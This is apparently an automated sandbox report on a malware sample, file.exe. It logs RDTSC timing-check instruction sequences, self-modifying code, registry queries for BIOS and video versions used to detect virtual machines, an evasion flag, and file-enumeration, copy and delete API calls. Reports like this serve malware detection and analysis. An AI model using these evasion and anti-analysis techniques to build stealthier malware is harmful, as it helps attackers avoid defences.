Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE292C second address: AE2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2932 second address: AE2937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2937 second address: AE296B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD95F8832h 0x00000008 jmp 00007F0AD95F8839h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E3DE second address: B8E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9BFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E3F4 second address: B8E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0AD95F8826h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E403 second address: B8E444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0AD8C6A9C9h 0x00000018 jmp 00007F0AD8C6A9C4h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E444 second address: B8E44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E44A second address: B8E44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9238B second address: B923A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jp 00007F0AD95F8826h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C830 second address: B9C834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C834 second address: B9C858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0AD95F882Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C858 second address: B9C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C3DF second address: B9C3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C3E5 second address: B9C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C3EB second address: B9C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FE85 second address: B9FE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FE90 second address: B9FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0AD95F8834h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9F9F7 second address: B9F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB1525 second address: BB152B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB398E second address: BB3992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB3992 second address: BB3998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8874 second address: BB8892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0AD8C6A9B6h 0x00000009 jmp 00007F0AD8C6A9C1h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8892 second address: BB8898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB89CE second address: BB89D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8CAD second address: BB8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f jmp 00007F0AD95F882Bh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8CDE second address: BB8CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8FDA second address: BB8FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9152 second address: BB9156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB92A5 second address: BB92D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD95F8844h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB92D1 second address: BB9305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 jmp 00007F0AD8C6A9C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9305 second address: BB930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB930F second address: BB9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC367E second address: BC3688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3688 second address: BC368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC368C second address: BC36CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b pushad 0x0000000c jne 00007F0AD95F8826h 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0AD95F8826h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F0AD95F882Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC36CA second address: BC36CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC36CE second address: BC36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC36D4 second address: BC36E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0AD8C6A9B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC36E4 second address: BC36E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCA48B second address: BCA492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC190 second address: BCC19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC19C second address: BCC1A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC1A2 second address: BCC1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F882Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC1B7 second address: BCC1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCF81F second address: BCF829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCF829 second address: BCF86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9CAh 0x0000000e jmp 00007F0AD8C6A9C2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 jl 00007F0AD8C6A9B6h 0x0000001f jmp 00007F0AD8C6A9C4h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE17C8 second address: BE17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE36DD second address: BE36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE32AF second address: BE32B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE32B3 second address: BE32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE32B7 second address: BE32C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE32C8 second address: BE32CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3443 second address: BE3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2F80 second address: BF2F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1DDF second address: BF1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0AD95F882Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1E09 second address: BF1E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF28EE second address: BF2904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0AD95F882Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2904 second address: BF2927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C3h 0x00000007 jo 00007F0AD8C6A9C2h 0x0000000d js 00007F0AD8C6A9B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2A6A second address: BF2A8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 jmp 00007F0AD95F8830h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F0AD95F882Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2A8C second address: BF2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2A90 second address: BF2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0AD95F8831h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0AD95F8826h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2C42 second address: BF2C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF2C4C second address: BF2C76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8836h 0x00000007 jg 00007F0AD95F8826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F0AD95F8826h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF46B0 second address: BF46C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF46C3 second address: BF46D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF46D9 second address: BF46DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7098 second address: BF70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0AD95F882Ch 0x0000000b jnp 00007F0AD95F8826h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF76D0 second address: BF771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0AD8C6A9C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F0AD8C6A9BDh 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F0AD8C6A9C5h 0x0000001d jc 00007F0AD8C6A9BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF771E second address: BF772E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 jl 00007F0AD95F882Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF772E second address: BF7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0AD8C6A9B8h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B09 second address: BF8B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B26 second address: BF8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B2C second address: BF8B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B36 second address: BF8B3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B3C second address: BF8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B48 second address: BF8B52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B52 second address: BF8B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8B61 second address: BF8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA32B second address: BFA330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517050B second address: 517052D instructions: 0x00000000 rdtsc 0x00000002 mov di, 5CA6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F0AD8C6A9BAh 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edx 0x00000017 mov ebx, 1230CC5Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517052D second address: 5170553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0AD95F882Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5170553 second address: 5170557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5170557 second address: 517055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517055D second address: 5170563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5170563 second address: 5170576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop eax 0x0000000e mov di, 69F0h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51705F4 second address: 5170614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5170614 second address: 5170618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5170618 second address: 517061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 517061C second address: 5170622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DB17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B17944 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B973C3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_006940F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0068E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00681710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_006947C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00694B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00693B00
